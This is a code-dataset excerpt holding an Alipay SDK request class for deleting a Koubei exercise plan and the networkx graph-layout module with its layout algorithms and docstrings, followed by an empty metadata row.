2021-12-29T04:34:12.000Z
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiServindustryExercisePlanDeleteModel import KoubeiServindustryExercisePlanDeleteModel
class KoubeiServindustryExercisePlanDeleteRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, KoubeiServindustryExercisePlanDeleteModel):
self._biz_content = value
else:
self._biz_content = KoubeiServindustryExercisePlanDeleteModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'koubei.servindustry.exercise.plan.delete'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
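# --- illustrative usage (added for clarity; not part of the SDK itself) ---
# A minimal sketch: the request wraps a populated biz model and serialises it into
# the `biz_content` parameter of the gateway method
# 'koubei.servindustry.exercise.plan.delete'. The notify URL below is a
# hypothetical placeholder.
#
#     model = KoubeiServindustryExercisePlanDeleteModel()
#     request = KoubeiServindustryExercisePlanDeleteRequest(biz_model=model)
#     request.notify_url = 'https://example.com/alipay/notify'
#     params = request.get_params()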
| 27.689655
| 148
| 0.648568
|
8018ff577238d94d12fa01209b3fb367d2e674b4
| 33,281
|
py
|
Python
|
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/drawing/layout.py
|
jonatanwestholm/networkx
|
4c5a033185f2fb2c692330bad7a7a47c95b3e5e5
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (C) 2004-2019 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# Richard Penney <rwpenney@users.sourceforge.net>
# Michael Fedell <mfedell@jpl.nasa.gov>
# Valentino Constantinou <vconstan@jpl.nasa.gov>
# All rights reserved.
# BSD license.
#
# Authors: Aric Hagberg <aric.hagberg@gmail.com>,
# Dan Schult <dschult@colgate.edu>
"""
******
Layout
******
Node positioning algorithms for graph drawing.
For `random_layout()` the possible resulting shape
is a square of side [0, scale] (default: [0, 1])
Changing `center` shifts the layout by that amount.
For the other layout routines, the extent is
[center - scale, center + scale] (default: [-1, 1]).
Warning: Most layout routines have only been tested in 2-dimensions.
"""
import networkx as nx
from networkx.utils import random_state
__all__ = ['bipartite_layout',
'circular_layout',
'kamada_kawai_layout',
'random_layout',
'rescale_layout',
'shell_layout',
'spring_layout',
'spectral_layout',
'planar_layout',
'fruchterman_reingold_layout',
'spiral_layout']
def _process_params(G, center, dim):
# Some boilerplate code.
import numpy as np
if not isinstance(G, nx.Graph):
empty_graph = nx.Graph()
empty_graph.add_nodes_from(G)
G = empty_graph
if center is None:
center = np.zeros(dim)
else:
center = np.asarray(center)
if len(center) != dim:
msg = "length of center coordinates must match dimension of layout"
raise ValueError(msg)
return G, center
@random_state(3)
def random_layout(G, center=None, dim=2, seed=None):
"""Position nodes uniformly at random in the unit square.
For every node, a position is generated by choosing each of dim
coordinates uniformly at random on the interval [0.0, 1.0).
NumPy (http://scipy.org) is required for this function.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
seed : int, RandomState instance or None optional (default=None)
Set the random state for deterministic node layouts.
If int, `seed` is the seed used by the random number generator,
if numpy.random.RandomState instance, `seed` is the random
number generator,
if None, the random number generator is the RandomState instance used
by numpy.random.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.lollipop_graph(4, 3)
>>> pos = nx.random_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
pos = seed.rand(len(G), dim) + center
pos = pos.astype(np.float32)
pos = dict(zip(G, pos))
return pos
def circular_layout(G, scale=1, center=None, dim=2):
# dim=2 only
"""Position nodes on a circle.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
If dim>2, the remaining dimensions are set to zero
in the returned positions.
If dim<2, a ValueError is raised.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim < 2
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.circular_layout(G)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
if dim < 2:
raise ValueError('cannot handle dimensions < 2')
G, center = _process_params(G, center, dim)
paddims = max(0, (dim - 2))
if len(G) == 0:
pos = {}
elif len(G) == 1:
pos = {nx.utils.arbitrary_element(G): center}
else:
# Discard the extra angle since it matches 0 radians.
theta = np.linspace(0, 1, len(G) + 1)[:-1] * 2 * np.pi
theta = theta.astype(np.float32)
pos = np.column_stack([np.cos(theta), np.sin(theta),
np.zeros((len(G), paddims))])
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
def shell_layout(G, nlist=None, scale=1, center=None, dim=2):
"""Position nodes in concentric circles.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
nlist : list of lists
List of node lists for each shell.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout, currently only dim=2 is supported.
Other dimension values result in a ValueError.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim != 2
Examples
--------
>>> G = nx.path_graph(4)
>>> shells = [[0], [1, 2, 3]]
>>> pos = nx.shell_layout(G, shells)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G): center}
if nlist is None:
# draw the whole graph in one shell
nlist = [list(G)]
if len(nlist[0]) == 1:
# single node at center
radius = 0.0
else:
# else start at r=1
radius = 1.0
npos = {}
for nodes in nlist:
# Discard the extra angle since it matches 0 radians.
theta = np.linspace(0, 1, len(nodes) + 1)[:-1] * 2 * np.pi
theta = theta.astype(np.float32)
pos = np.column_stack([np.cos(theta), np.sin(theta)])
if len(pos) > 1:
pos = rescale_layout(pos, scale=scale * radius / len(nlist)) + center
else:
pos = np.array([(scale * radius + center[0], center[1])])
npos.update(zip(nodes, pos))
radius += 1.0
return npos
def bipartite_layout(G, nodes, align='vertical',
scale=1, center=None, aspect_ratio=4/3):
"""Position nodes in two straight lines.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
nodes : list or container
Nodes in one node set of the bipartite graph.
This set will be placed on left or top.
align : string (default='vertical')
The alignment of nodes. Vertical or horizontal.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
aspect_ratio : number (default=4/3):
The ratio of the width to the height of the layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node.
Examples
--------
>>> G = nx.bipartite.gnmk_random_graph(3, 5, 10, seed=123)
>>> top = nx.bipartite.sets(G)[0]
>>> pos = nx.bipartite_layout(G, top)
Notes
-----
This algorithm currently only works in two dimensions and does not
try to minimize edge crossings.
"""
import numpy as np
G, center = _process_params(G, center=center, dim=2)
if len(G) == 0:
return {}
height = 1
width = aspect_ratio * height
offset = (width/2, height/2)
top = set(nodes)
bottom = set(G) - top
nodes = list(top) + list(bottom)
if align == 'vertical':
left_xs = np.repeat(0, len(top))
right_xs = np.repeat(width, len(bottom))
left_ys = np.linspace(0, height, len(top))
right_ys = np.linspace(0, height, len(bottom))
top_pos = np.column_stack([left_xs, left_ys]) - offset
bottom_pos = np.column_stack([right_xs, right_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(nodes, pos))
return pos
if align == 'horizontal':
top_ys = np.repeat(height, len(top))
bottom_ys = np.repeat(0, len(bottom))
top_xs = np.linspace(0, width, len(top))
bottom_xs = np.linspace(0, width, len(bottom))
top_pos = np.column_stack([top_xs, top_ys]) - offset
bottom_pos = np.column_stack([bottom_xs, bottom_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(nodes, pos))
return pos
msg = 'align must be either vertical or horizontal.'
raise ValueError(msg)
@random_state(10)
def fruchterman_reingold_layout(G,
k=None,
pos=None,
fixed=None,
iterations=50,
threshold=1e-4,
weight='weight',
scale=1,
center=None,
dim=2,
seed=None):
"""Position nodes using Fruchterman-Reingold force-directed algorithm.
The algorithm simulates a force-directed representation of the network
treating edges as springs holding nodes close, while treating nodes
as repelling objects, sometimes called an anti-gravity force.
Simulation continues until the positions are close to an equilibrium.
There are some hard-coded values: minimal distance between
nodes (0.01) and "temperature" of 0.1 to ensure nodes don't fly away.
During the simulation, `k` helps determine the distance between nodes,
though `scale` and `center` determine the size and place after
rescaling occurs at the end of the simulation.
Fixing some nodes doesn't allow them to move in the simulation.
It also turns off the rescaling feature at the simulation's end.
In addition, setting `scale` to `None` turns off rescaling.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
k : float (default=None)
Optimal distance between nodes. If None the distance is set to
1/sqrt(n) where n is the number of nodes. Increase this value
to move nodes farther apart.
pos : dict or None optional (default=None)
Initial positions for nodes as a dictionary with node as keys
and values as a coordinate list or tuple. If None, then use
random initial positions.
fixed : list or None optional (default=None)
Nodes to keep fixed at initial position.
ValueError raised if `fixed` specified and `pos` not.
iterations : int optional (default=50)
Maximum number of iterations taken
threshold: float optional (default = 1e-4)
Threshold for relative error in node position changes.
The iteration stops if the error is below this threshold.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number or None (default: 1)
Scale factor for positions. Not used unless `fixed is None`.
If scale is None, no rescaling is performed.
center : array-like or None
Coordinate pair around which to center the layout.
Not used unless `fixed is None`.
dim : int
Dimension of layout.
seed : int, RandomState instance or None optional (default=None)
Set the random state for deterministic node layouts.
If int, `seed` is the seed used by the random number generator,
if numpy.random.RandomState instance, `seed` is the random
number generator,
if None, the random number generator is the RandomState instance used
by numpy.random.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spring_layout(G)
# The same using longer but equivalent function name
>>> pos = nx.fruchterman_reingold_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
if fixed is not None:
if pos is None:
raise ValueError('nodes are fixed without positions given')
for node in fixed:
if node not in pos:
raise ValueError('nodes are fixed without positions given')
nfixed = {node: i for i, node in enumerate(G)}
fixed = np.asarray([nfixed[node] for node in fixed])
if pos is not None:
# Determine size of existing domain to adjust initial positions
dom_size = max(coord for pos_tup in pos.values() for coord in pos_tup)
if dom_size == 0:
dom_size = 1
pos_arr = seed.rand(len(G), dim) * dom_size + center
for i, n in enumerate(G):
if n in pos:
pos_arr[i] = np.asarray(pos[n])
else:
pos_arr = None
dom_size = 1
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G.nodes()): center}
try:
# Sparse matrix
if len(G) < 500: # sparse solver for large graphs
raise ValueError
A = nx.to_scipy_sparse_matrix(G, weight=weight, dtype='f')
if k is None and fixed is not None:
# We must adjust k by domain size for layouts not near 1x1
nnodes, _ = A.shape
k = dom_size / np.sqrt(nnodes)
pos = _sparse_fruchterman_reingold(A, k, pos_arr, fixed,
iterations, threshold,
dim, seed)
except:
A = nx.to_numpy_array(G, weight=weight)
if k is None and fixed is not None:
# We must adjust k by domain size for layouts not near 1x1
nnodes, _ = A.shape
k = dom_size / np.sqrt(nnodes)
pos = _fruchterman_reingold(A, k, pos_arr, fixed, iterations,
threshold, dim, seed)
if fixed is None and scale is not None:
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
spring_layout = fruchterman_reingold_layout
@random_state(7)
def _fruchterman_reingold(A, k=None, pos=None, fixed=None, iterations=50,
threshold=1e-4, dim=2, seed=None):
# Position nodes in adjacency matrix A using Fruchterman-Reingold
# Entry point for NetworkX graph is fruchterman_reingold_layout()
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
if pos is None:
# random initial positions
pos = np.asarray(seed.rand(nnodes, dim), dtype=A.dtype)
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
# We need to calculate this in case our fixed positions force our domain
# to be much bigger than 1x1
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
delta = np.zeros((pos.shape[0], pos.shape[0], pos.shape[1]), dtype=A.dtype)
# the inscrutable (but fast) version
# this is still O(V^2)
# could use multilevel methods to speed this up significantly
for iteration in range(iterations):
# matrix of difference between points
delta = pos[:, np.newaxis, :] - pos[np.newaxis, :, :]
# distance between points
distance = np.linalg.norm(delta, axis=-1)
# enforce minimum distance of 0.01
np.clip(distance, 0.01, None, out=distance)
# displacement "force"
displacement = np.einsum('ijk,ij->ik',
delta,
(k * k / distance**2 - A * distance / k))
# update positions
length = np.linalg.norm(displacement, axis=-1)
length = np.where(length < 0.01, 0.1, length)
delta_pos = np.einsum('ij,i->ij', displacement, t / length)
if fixed is not None:
# don't change positions of fixed nodes
delta_pos[fixed] = 0.0
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
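# Worked note (added for clarity): with optimal distance k, the classic
# Fruchterman-Reingold forces between two nodes separated by distance d are
#     repulsive:  f_r(d) = k**2 / d      (between every pair of nodes)
#     attractive: f_a(d) = d**2 / k      (only along edges, weighted by A)
# The einsum in _fruchterman_reingold() folds both into the per-pair coefficient
#     k**2 / d**2 - A * d / k
# which, multiplied by the displacement vector `delta` (whose length is d),
# gives a net force of magnitude k**2 / d - A * d**2 / k along the line
# between the two nodes.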
@random_state(7)
def _sparse_fruchterman_reingold(A, k=None, pos=None, fixed=None,
iterations=50, threshold=1e-4, dim=2,
seed=None):
# Position nodes in adjacency matrix A using Fruchterman-Reingold
# Entry point for NetworkX graph is fruchterman_reingold_layout()
# Sparse version
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
try:
from scipy.sparse import spdiags, coo_matrix
except ImportError:
msg = "_sparse_fruchterman_reingold() scipy numpy: http://scipy.org/ "
raise ImportError(msg)
    # make sure we have a List of Lists representation
try:
A = A.tolil()
except:
A = (coo_matrix(A)).tolil()
if pos is None:
# random initial positions
pos = np.asarray(seed.rand(nnodes, dim), dtype=A.dtype)
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# no fixed nodes
if fixed is None:
fixed = []
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
displacement = np.zeros((dim, nnodes))
for iteration in range(iterations):
displacement *= 0
# loop over rows
for i in range(A.shape[0]):
if i in fixed:
continue
# difference between this row's node position and all others
delta = (pos[i] - pos).T
# distance between points
distance = np.sqrt((delta**2).sum(axis=0))
# enforce minimum distance of 0.01
distance = np.where(distance < 0.01, 0.01, distance)
# the adjacency matrix row
Ai = np.asarray(A.getrowview(i).toarray())
# displacement "force"
displacement[:, i] +=\
(delta * (k * k / distance**2 - Ai * distance / k)).sum(axis=1)
# update positions
length = np.sqrt((displacement**2).sum(axis=0))
length = np.where(length < 0.01, 0.1, length)
delta_pos = (displacement * t / length).T
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
def kamada_kawai_layout(G, dist=None,
pos=None,
weight='weight',
scale=1,
center=None,
dim=2):
"""Position nodes using Kamada-Kawai path-length cost-function.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
dist : float (default=None)
A two-level dictionary of optimal distances between nodes,
indexed by source and destination node.
If None, the distance is computed using shortest_path_length().
pos : dict or None optional (default=None)
Initial positions for nodes as a dictionary with node as keys
and values as a coordinate list or tuple. If None, then use
circular_layout() for dim >= 2 and a linear layout for dim == 1.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.kamada_kawai_layout(G)
"""
import numpy as np
G, center = _process_params(G, center, dim)
nNodes = len(G)
if dist is None:
dist = dict(nx.shortest_path_length(G, weight=weight))
dist_mtx = 1e6 * np.ones((nNodes, nNodes))
for row, nr in enumerate(G):
if nr not in dist:
continue
rdist = dist[nr]
for col, nc in enumerate(G):
if nc not in rdist:
continue
dist_mtx[row][col] = rdist[nc]
if pos is None:
if dim >= 2:
pos = circular_layout(G, dim=dim)
else:
pos = {n: pt for n, pt in zip(G, np.linspace(0, 1, len(G)))}
pos_arr = np.array([pos[n] for n in G])
pos = _kamada_kawai_solve(dist_mtx, pos_arr, dim)
pos = rescale_layout(pos, scale=scale) + center
return dict(zip(G, pos))
def _kamada_kawai_solve(dist_mtx, pos_arr, dim):
# Anneal node locations based on the Kamada-Kawai cost-function,
# using the supplied matrix of preferred inter-node distances,
# and starting locations.
import numpy as np
from scipy.optimize import minimize
meanwt = 1e-3
costargs = (np, 1 / (dist_mtx + np.eye(dist_mtx.shape[0]) * 1e-3),
meanwt, dim)
optresult = minimize(_kamada_kawai_costfn, pos_arr.ravel(),
method='L-BFGS-B', args=costargs, jac=True)
return optresult.x.reshape((-1, dim))
def _kamada_kawai_costfn(pos_vec, np, invdist, meanweight, dim):
# Cost-function and gradient for Kamada-Kawai layout algorithm
nNodes = invdist.shape[0]
pos_arr = pos_vec.reshape((nNodes, dim))
delta = pos_arr[:, np.newaxis, :] - pos_arr[np.newaxis, :, :]
nodesep = np.linalg.norm(delta, axis=-1)
direction = np.einsum('ijk,ij->ijk',
delta,
1 / (nodesep + np.eye(nNodes) * 1e-3))
offset = nodesep * invdist - 1.0
offset[np.diag_indices(nNodes)] = 0
cost = 0.5 * np.sum(offset ** 2)
grad = (np.einsum('ij,ij,ijk->ik', invdist, offset, direction) -
np.einsum('ij,ij,ijk->jk', invdist, offset, direction))
# Additional parabolic term to encourage mean position to be near origin:
sumpos = np.sum(pos_arr, axis=0)
cost += 0.5 * meanweight * np.sum(sumpos ** 2)
grad += meanweight * sumpos
return (cost, grad.ravel())
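# Worked note (added for clarity): writing d_ij for the target graph distance and
# r_ij = ||x_i - x_j|| for the current Euclidean separation, the cost above is
#     E(x) = 0.5 * sum_ij (r_ij / d_ij - 1)**2 + 0.5 * meanweight * ||sum_i x_i||**2
# i.e. the usual Kamada-Kawai stress (summed over ordered pairs, so every
# unordered pair is counted twice) plus a weak quadratic term pulling the
# centroid towards the origin; `grad` is the corresponding analytic gradient
# consumed by L-BFGS-B in _kamada_kawai_solve().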
def spectral_layout(G, weight='weight', scale=1, center=None, dim=2):
"""Position nodes using the eigenvectors of the graph Laplacian.
    Using the unnormalized Laplacian, the layout shows possible clusters of
nodes which are an approximation of the ratio cut. If dim is the number of
dimensions then the positions are the entries of the dim eigenvectors
corresponding to the ascending eigenvalues starting from the second one.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None, then all edge weights are 1.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spectral_layout(G)
Notes
-----
Directed graphs will be considered as undirected graphs when
positioning the nodes.
For larger graphs (>500 nodes) this will use the SciPy sparse
eigenvalue solver (ARPACK).
"""
# handle some special cases that break the eigensolvers
import numpy as np
G, center = _process_params(G, center, dim)
if len(G) <= 2:
if len(G) == 0:
pos = np.array([])
elif len(G) == 1:
pos = np.array([center])
else:
pos = np.array([np.zeros(dim), np.array(center) * 2.0])
return dict(zip(G, pos))
try:
# Sparse matrix
if len(G) < 500: # dense solver is faster for small graphs
raise ValueError
A = nx.to_scipy_sparse_matrix(G, weight=weight, dtype='d')
# Symmetrize directed graphs
if G.is_directed():
A = A + np.transpose(A)
pos = _sparse_spectral(A, dim)
except (ImportError, ValueError):
# Dense matrix
A = nx.to_numpy_array(G, weight=weight)
# Symmetrize directed graphs
if G.is_directed():
A += A.T
pos = _spectral(A, dim)
pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(G, pos))
return pos
def _spectral(A, dim=2):
# Input adjacency matrix A
# Uses dense eigenvalue solver from numpy
import numpy as np
try:
nnodes, _ = A.shape
except AttributeError:
msg = "spectral() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
# form Laplacian matrix where D is diagonal of degrees
D = np.identity(nnodes, dtype=A.dtype) * np.sum(A, axis=1)
L = D - A
eigenvalues, eigenvectors = np.linalg.eig(L)
# sort and keep smallest nonzero
index = np.argsort(eigenvalues)[1:dim + 1] # 0 index is zero eigenvalue
return np.real(eigenvectors[:, index])
def _sparse_spectral(A, dim=2):
# Input adjacency matrix A
# Uses sparse eigenvalue solver from scipy
# Could use multilevel methods here, see Koren "On spectral graph drawing"
import numpy as np
from scipy.sparse import spdiags
from scipy.sparse.linalg.eigen import eigsh
try:
nnodes, _ = A.shape
except AttributeError:
msg = "sparse_spectral() takes an adjacency matrix as input"
raise nx.NetworkXError(msg)
# form Laplacian matrix
data = np.asarray(A.sum(axis=1).T)
D = spdiags(data, 0, nnodes, nnodes)
L = D - A
k = dim + 1
    # number of Lanczos vectors for ARPACK solver. What is the right scaling?
ncv = max(2 * k + 1, int(np.sqrt(nnodes)))
# return smallest k eigenvalues and eigenvectors
eigenvalues, eigenvectors = eigsh(L, k, which='SM', ncv=ncv)
index = np.argsort(eigenvalues)[1:k] # 0 index is zero eigenvalue
return np.real(eigenvectors[:, index])
def planar_layout(G, scale=1, center=None, dim=2):
"""Position nodes without edge intersections.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G. If G is of type
nx.PlanarEmbedding, the positions are selected accordingly.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
------
nx.NetworkXException
If G is not planar
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.planar_layout(G)
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if isinstance(G, nx.PlanarEmbedding):
embedding = G
else:
is_planar, embedding = nx.check_planarity(G)
if not is_planar:
raise nx.NetworkXException("G is not planar.")
pos = nx.combinatorial_embedding_to_pos(embedding)
node_list = list(embedding)
pos = np.row_stack((pos[x] for x in node_list))
pos = pos.astype(np.float64)
pos = rescale_layout(pos, scale=scale) + center
return dict(zip(node_list, pos))
def spiral_layout(G, scale=1, center=None, dim=2,
resolution=0.35, equidistant=False):
"""Position nodes in a spiral layout.
Parameters
----------
G : NetworkX graph or list of nodes
A position will be assigned to every node in G.
scale : number (default: 1)
Scale factor for positions.
center : array-like or None
Coordinate pair around which to center the layout.
dim : int
Dimension of layout, currently only dim=2 is supported.
Other dimension values result in a ValueError.
resolution : float
The compactness of the spiral layout returned.
Lower values result in more compressed spiral layouts.
equidistant : bool
If True, nodes will be plotted equidistant from each other.
Returns
-------
pos : dict
A dictionary of positions keyed by node
Raises
-------
ValueError
If dim != 2
Examples
--------
>>> G = nx.path_graph(4)
>>> pos = nx.spiral_layout(G)
Notes
-----
This algorithm currently only works in two dimensions.
"""
import numpy as np
if dim != 2:
raise ValueError('can only handle 2 dimensions')
G, center = _process_params(G, center, dim)
if len(G) == 0:
return {}
if len(G) == 1:
return {nx.utils.arbitrary_element(G): center}
pos = []
if equidistant:
chord = 1
step = 0.5
theta = resolution
for _ in range(len(G)):
r = step * theta
theta += chord / r
pos.append([np.cos(theta) * r, np.sin(theta) * r])
else:
# set the starting angle and step
step = 1
angle = 0.0
dist = 0.0
# set the radius for the spiral to the number of nodes in the graph
radius = len(G)
while dist * np.hypot(np.cos(angle), np.sin(angle)) < radius:
pos.append([dist * np.cos(angle), dist * np.sin(angle)])
dist += step
angle += resolution
pos = rescale_layout(np.array(pos), scale=scale) + center
pos = dict(zip(G, pos))
return pos
def rescale_layout(pos, scale=1):
"""Returns scaled position array to (-scale, scale) in all axes.
The function acts on NumPy arrays which hold position information.
Each position is one row of the array. The dimension of the space
equals the number of columns. Each coordinate in one column.
To rescale, the mean (center) is subtracted from each axis separately.
Then all values are scaled so that the largest magnitude value
from all axes equals `scale` (thus, the aspect ratio is preserved).
The resulting NumPy Array is returned (order of rows unchanged).
Parameters
----------
pos : numpy array
positions to be scaled. Each row is a position.
scale : number (default: 1)
The size of the resulting extent in all directions.
Returns
-------
pos : numpy array
scaled positions. Each row is a position.
"""
# Find max length over all dimensions
lim = 0 # max coordinate for all axes
for i in range(pos.shape[1]):
pos[:, i] -= pos[:, i].mean()
lim = max(abs(pos[:, i]).max(), lim)
# rescale to (-scale, scale) in all directions, preserves aspect
if lim > 0:
for i in range(pos.shape[1]):
pos[:, i] *= scale / lim
return pos
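# --- illustrative usage (added for clarity; not part of the upstream module) ---
# A minimal sketch: three collinear points are centred per axis and then scaled so
# the largest absolute coordinate equals `scale`, preserving the aspect ratio.
#
#     >>> import numpy as np
#     >>> rescale_layout(np.array([[0.0, 0.0], [1.0, 0.0], [2.0, 0.0]]), scale=1)
#     array([[-1.,  0.],
#            [ 0.,  0.],
#            [ 1.,  0.]])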
| 31.045709
| 81
| 0.602145
|
0c72d3290927fd4508a029a422fb224801e2abb6
| 2,167
|
py
|
Python
|
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
basic/list2.py
|
mushfeqr/google-python3-exercises
|
1c05f823ddd8c1e09e6010560321cc42fce095d2
|
[
"Apache-2.0"
] | null | null | null |
